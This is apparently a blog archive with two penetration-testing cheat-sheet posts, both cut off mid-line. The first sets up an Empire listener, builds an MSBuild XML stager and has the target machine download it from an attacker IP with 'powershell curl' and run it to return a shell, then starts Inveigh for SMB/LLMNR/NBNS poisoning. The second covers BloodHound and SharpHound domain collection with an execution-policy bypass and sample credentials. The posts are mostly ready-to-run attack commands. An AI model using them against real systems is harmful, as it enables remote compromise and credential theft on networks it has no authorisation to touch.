Posts

Showing posts from July, 2021

Empire

    https://github.com/BC-SECURITY/Empire/releases

    #installing Empire
    apt-get install autoconf
    tar -xzfv empire.tar.gz
    cd setup && ./install
    cd ../
    ./empire

    Reverse Shell to Empire
    uselistener http
    (Empire: listeners/http) > set BindIP 10.10.10.10
    (Empire: listeners/http) > set Name 10.10.10.10
    (Empire: listeners/http) > set Port 8001
    (Empire: listeners/http) > execute

    Getting the shell back
    usestager windows/launcher_xml
    set Listener http
    set OutFile /root/a.xml

    #on the target machine run
    powershell curl http://10.10.10.12:8002/a.xml -outfile a.xml
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe c:\users\bhanu\a.xml

    Running Inveigh on Empire
    Agents
    Interact [ID]
    usemodule collection/inveigh
    (Empire: powershell/collection/inveigh) > set SMB Y
    (Empire: powershell/collection/inveigh) > set LLMNR Y
    (Empire: powershell/collection/inveigh) > set NBNS Y
    (Empire: powershell/collection/inveigh) > set Proxy Y
    (Empire: powershell/collection/inveig

Bloodhound Usage

    BloodHound-Python
    If you have access to DC, need admin creds - Github

    Linux:
    proxychains python3 bloodhound.py -d Steins.local -u admin -p p@$$W0rd! -c all -dc dc.steins.local -gc dc.steins.local -v -ns 10.10.10.10 --dns-tcp
    Few files will appear in the same location, import them into bloodhound

    Kali:
    apt-get install bloodhound
    sudo neo4j console
    go to localhost:7474
    neo4j: neo4j #login in browser and change the password
    bloodhound #bloodhound login will pop-up, login with new creds

    Windows:
    Download this on Windows target: SharpHound.ps1
    powershell -ep bypass
    ..\SharpHound.ps1
    invoke-Bloodhound -CollectionMethod All -Domain Steins.local -ZipfileName file.zip
    invoke-Bloodhound -CollectionMethod LoggedOn -Verbose
    or
    SharpHound.exe -c All -d Steins.local --zipfilename test.zip
    OR
    .\SharpHound.exe -d steins.local --domaincontroller 192.168.168.168 --ldapusername admin --ldappassword P@$$W0rd! --zipfilename domain.zip -c All
    open the file in bloodhound --> click on upload --&g